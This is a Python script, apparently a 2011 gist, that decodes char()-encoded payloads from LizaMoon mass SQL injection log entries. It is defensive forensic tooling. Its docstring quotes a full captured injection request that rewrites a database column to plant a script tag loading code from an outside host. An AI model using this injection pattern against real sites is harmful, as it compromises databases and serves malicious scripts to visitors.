
@binjo
Created April 7, 2011 01:50
Decode log entries from the LizaMoon mass SQL injection attack
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
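decode_lizamoon.py

Decode the char()-encoded payload found in log entries of the LizaMoon mass
SQL injection attack. Sample log entry (target address redacted):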
"2011-04-02 00:33:05","194.28.44.190","xxx.xxx.xxx.xxx","GET","http","xxx.xxx.xxx.xxx/en_publications_details.aspx?infoid=fd8c9e72-dfcb-4fdc-aad4-d524339bf6071'+update+tConferenceInfo+set+strDescription=REPLACE(cast(strDescription+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(116)%2Bchar(97)%2Bchar(100)%2Bchar(121)%2Bchar(103)%2Bchar(117)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--","SQL Injection","URL Query","000)),cast(char(32)+as+varchar(8)))--","block_log"
"""
# Module metadata: author, script version and date stamp.
__author__ = 'Binjo'
__version__ = '0.1'
__date__ = '2011-04-06 21:30:45'
import os, sys
import re
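class Lizamoon(object):
    """Decoder for LizaMoon SQL injection entries found in log lines.

    Each line is searched for the injected ``update+<table>+set+<column>=``
    statement and for the first ``cast(char(N)%2Bchar(N)...)`` run, which
    holds the injected markup as decimal character codes.  Unique
    ``table,column,payload`` strings are collected in first-seen order.

    The decoded payload is attacker-controlled text (in the sample entry of
    the module docstring it is a ``</title><script src=...>`` fragment), so
    treat the output as data: do not render it or feed it to an interpreter.
    """

    # Captures the table and column named by the injected UPDATE statement.
    _UPDATE_RE = re.compile(r'.*update\+([^+].*?)\+set\+([^=].*?)=.*')
    _PAYLOAD_START = "cast(char("
    _PAYLOAD_END = ")+as+varchar("

    def __init__(self, ):
        """Start with no table/column seen and an empty result list."""
        self._table = ""
        self._colmn = ""
        self._dcded = []

    def decode(self, data):
        """Decode one log line and record its ``table,column,payload`` entry.

        Lines without an injected ``update ... set`` statement are ignored, so
        they neither add an empty ``,,`` entry nor inherit the table and
        column of an earlier line.  If the character codes cannot be
        converted (non-numeric or out of range), the undecoded segment is
        recorded instead, so the entry is still reported.

        Arguments:
        - `data`: one log line, as text or as bytes.
        """
        # Lines read in binary mode arrive as bytes on Python 3; latin-1 maps
        # every byte to exactly one character, so this decoding cannot fail.
        if not isinstance(data, str):
            data = data.decode("latin-1")

        found = self._UPDATE_RE.match(data)
        if found is None:
            return
        self._table = found.group(1)
        self._colmn = found.group(2)
        entry = "%s,%s," % (self._table, self._colmn)

        start = data.find(self._PAYLOAD_START)
        end = data.find(self._PAYLOAD_END, start) if start != -1 else -1
        if end != -1:
            # The segment looks like "60)%2Bchar(47)%2Bchar(116": the first
            # code is bare, the others are joined by URL-encoded "+" signs.
            segment = data[start + len(self._PAYLOAD_START):end]
            codes = segment.replace(")%2Bchar(", " ").split(" ")
            try:
                entry += "".join(chr(int(code)) for code in codes)
            except ValueError:
                # Malformed payload: keep the raw segment rather than abort
                # the whole run on one bad line.
                entry += segment

        # A list keeps first-seen order; the number of distinct entries is
        # expected to be small compared with the number of log lines.
        if entry not in self._dcded:
            self._dcded.append(entry)

    def x(self):
        """Print every unique decoded entry, one per line.

        The printed text comes from the attacker's request; see the class
        docstring before pasting it anywhere that interprets markup.
        """
        for v in self._dcded:
            print(v)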
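def main():
    """Decode the log file named on the command line and print the results.

    Expects exactly one argument, the path of the log file; otherwise exits
    with a usage string.  Every line is passed to ``Lizamoon.decode`` and the
    unique decoded entries are printed afterwards.
    """
    if len(sys.argv) != 2:
        sys.exit("%s lizamoon.txt" % sys.argv[0])

    liza = Lizamoon()
    # The with-block closes the file even if decoding raises.  The explicit
    # loop replaces map(liza.decode, ...), which is lazy on Python 3 and would
    # decode nothing there; it also avoids holding the whole log in memory.
    with open(sys.argv[1], 'rb') as log:
        for line in log:
            liza.decode(line)
    liza.x()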
#-------------------------------------------------------------------------------
if __name__ == "__main__":
    # Run the decoder only when executed as a script, not when imported.
    main()
#-------------------------------------------------------------------------------
# EOF